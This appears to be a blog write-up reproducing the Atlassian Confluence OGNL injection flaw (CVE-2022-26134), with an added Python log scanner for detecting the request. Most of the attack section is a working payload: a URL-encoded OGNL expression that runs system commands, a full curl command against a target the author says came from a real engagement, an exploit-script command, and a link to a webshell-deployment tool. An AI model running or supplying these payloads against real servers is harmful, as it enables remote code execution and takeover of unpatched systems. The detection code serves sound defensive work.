Reproducing the Confluence OGNL Injection Vulnerability (CVE-2022-26134)

Original  Hacker 0xh4ck3r  2025-01-23 03:20

Affected versions

Confluence Server & Data Center ≥ 1.3.0

Atlassian Confluence Server and Data Center < 7.4.17
Atlassian Confluence Server and Data Center < 7.13.7
Atlassian Confluence Server and Data Center < 7.14.3
Atlassian Confluence Server and Data Center < 7.15.2
Atlassian Confluence Server and Data Center < 7.16.4
Atlassian Confluence Server and Data Center < 7.17.4
Atlassian Confluence Server and Data Center < 7.18.1

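Root cause

Atlassian Confluence contains a remote code execution vulnerability. On June 2, 2022, Atlassian published a security advisory disclosing a remote code execution vulnerability in Confluence Server and Data Center. For a detailed analysis, see: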

https://www.anquanke.com/post/id/274026

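Exploitation

Environment setup

Name              IP
Attacker machine  192.168.159.128
Target            xxx.xxx.xxx.xxx

The target here is one I came across in a real-world engagement; also, vulhub has not yet added this vulnerability.

Screenshot of the target:

[Screenshot: image-20220729145604908]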

Reproduction

Manual reproduction

PoC:

/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Response%22%2C%23a%29%29%7D/

Test:

curl -vv "http://xxx.xxx.xxx.xxx:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Response%22%2C%23a%29%29%7D/"

The result is shown in the screenshot below:

[Screenshot: image-20220729152043723]
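
From the defender's side, the request shape used in the manual test above can be hunted in web access logs. The following is an added example, not from the original post or from any tool it links to: it percent-decodes request paths and flags `${...}` expressions, raising the severity when substrings from the PoC above are present. The log lines are constructed samples, and the names `decode_path`, `classify` and `scan` are assumptions.

```python
import re
from urllib.parse import unquote

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<uri>\S+) HTTP/[\d.]+"')
# A ${...} expression left in the path after decoding.
WRAPPER_RE = re.compile(r"\$\{.*\}", re.DOTALL)
# Substrings from the PoC shown on this page; any hit raises the severity.
MARKERS = ("@java.lang.Runtime@", "ServletActionContext", ".exec(", "setHeader(")
# The request path from the curl test on this page, split only for line length.
PAGE_POC_PATH = ("/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28"
    "%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29"
    "%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext"
    "%40getResponse%28%29.setHeader%28%22X-Response%22%2C%23a%29%29%7D/")
# Constructed sample log lines (addresses from the documentation ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Jul/2022:15:19:58 +0800] "GET /login.action HTTP/1.1" 200 9120',
    '198.51.100.7 - - [29/Jul/2022:15:20:43 +0800] "GET ' + PAGE_POC_PATH + ' HTTP/1.1" 302 0',
    '198.51.100.7 - - [29/Jul/2022:15:21:02 +0800] "GET /%2524%257B1%2B1%257D/ HTTP/1.1" 302 0',
    '192.0.2.10 - - [29/Jul/2022:15:22:10 +0800] "GET /display/DOC/Price+%24100 HTTP/1.1" 200 512',
]

def decode_path(uri, max_rounds=3):
    """Drop the query string, then percent-decode until stable (catches double encoding)."""
    path = uri.split("?", 1)[0]  # the PoC on this page carries the expression in the path
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def classify(line):
    """Return 'high', 'suspicious' or None for one access log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path = decode_path(m.group("uri"))
    if not WRAPPER_RE.search(path):
        return None
    return "high" if any(k in path for k in MARKERS) else "suspicious"

def scan(lines):
    """Return (line_number, severity) for every flagged line."""
    results = ((n, classify(line)) for n, line in enumerate(lines, 1))
    return [(n, sev) for n, sev in results if sev]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A "suspicious" hit means a `${...}` wrapper with none of the listed substrings, so it should be reviewed rather than dismissed, since the marker list only covers the PoC shown here.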

Reproduction with a tool

Prepare the PoC generation tool: cve-2022-26134.py

Tool URL: https://github.com/Nwqda/CVE-2022-26134

Then run the command below:

python cve-2022-26134.py "http://xxx.xxx.xxx.xxx:8090/" "id"

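[Screenshot: image-20220729152816186]

As shown, the vulnerability was exploited successfully!

Appendix: tool for generating a one-click Godzilla connection: https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL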